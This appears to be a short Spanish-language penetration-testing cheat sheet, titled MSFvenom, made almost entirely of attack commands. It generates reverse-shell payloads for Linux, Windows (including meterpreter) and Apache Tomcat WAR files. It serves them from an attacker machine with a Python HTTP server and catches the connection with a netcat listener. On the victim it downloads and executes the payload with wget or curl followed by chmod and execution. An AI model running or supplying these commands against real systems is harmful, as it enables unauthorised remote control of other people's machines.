MSFvenom

Linux/Unix

# Máquina atacante
msfvenom -p linux/x64/shell_reverse_tcp lhost=<attacker-IP-address> lport=<listen-port> -f elf -o revshell
python3 -m http.server 80
rlwrap nc -lvnp <listen-port>

# Máquina victima
## wget
wget http://<attacker-IP-address>:80/revshell -O /tmp/revshell; chmod +x /tmp/revshell; /tmp/revshell
## curl
curl http://<attacker-IP-address>:80/revshell -o /tmp/revshell; chmod +x /tmp/revshell; /tmp/revshell

Telnet

msfvenom -p cmd/unix/reverse_netcat lhost=<attacker-IP-address> lport=<listen-port> R

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f exe -o reverse-shell.exe
msfvenom -p windows/x64/shell_reverse_tcp lhost=<attacker-IP-address> lport=<listen-port> -f exe -o reverse-shell.exe

Apache Tomcat

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=<listen-port> -f war -o reverse-shell.war

Última actualización